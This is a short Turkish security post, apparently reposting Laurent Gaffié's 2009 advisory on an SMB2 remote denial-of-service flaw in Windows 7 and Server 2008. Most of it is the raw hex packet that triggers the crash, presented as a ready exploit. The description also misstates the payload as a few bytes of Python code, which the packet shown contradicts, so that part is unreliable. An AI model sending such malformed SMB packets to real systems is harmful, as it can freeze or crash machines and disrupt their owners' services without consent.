Windows 7 Güvenlik Açığı – Remote DOS Exploit

Risk/Seviye: Yüksek
Remote Exploit: Aktif
Local Exploit: Pasif
Credit : Laurent Gaffié
Published : 17.11.2009
Etkilenenler: Windows 7 ve Windows Server 2008
Açıklama: Microsoft’un Windows 7’sinin SMB Protokolünün (Server Message Block) zayıflığı yüzünden uzaktan kodlar gönderilerek dondurabiliyor ya da sistem tamamen çökertilebiliyor. NetBIOS üzerinden gönderilen yaklaşıok 4 BYTE boyutunda bir Python Kodu Sistemin donmasına ve Kilitlenip Çökme dediğimiz olayın gerçekleşmesine neden oluyor. Güvenlik Zaafıyatını raporlayan Güvenlik uzmanı kişisi bu Kodun boyutunu 2 BYTE olarak denediğini ve Sistemin zaafiyata uğradığını belirtmiş.

Exploit (Windows 7 Remote DOS Exploit) :

packet = “\x00\x00\x00\x9a” # –> length should be 9e not 9a..
“\xfe\x53\x4d\x42\x40\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00″
“\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00″
“\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00″
“\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00″
“\x41\x00\x01\x00\x02\x02\x00\x00\x30\x82\xa4\x11\xe3\x12\x23\x41″
“\xaa\x4b\xad\x99\xfd\x52\x31\x8d\x01\x00\x00\x00\x00\x00\x01\x00″
“\x00\x00\x01\x00\x00\x00\x01\x00\xcf\x73\x67\x74\x62\x60\xca\x01″
“\xcb\x51\xe0\x19\x62\x60\xca\x01\x80\x00\x1e\x00\x20\x4c\x4d\x20″
“\x60\x1c\x06\x06\x2b\x06\x01\x05\x05\x02\xa0\x12\x30\x10\xa0\x0e”
“\x30\x0c\x06\x0a\x2b\x06\x01\x04\x01\x82\x37\x02\x02\x0a”

Security Advisory: Laurent Gaffié

Filed Under: Genel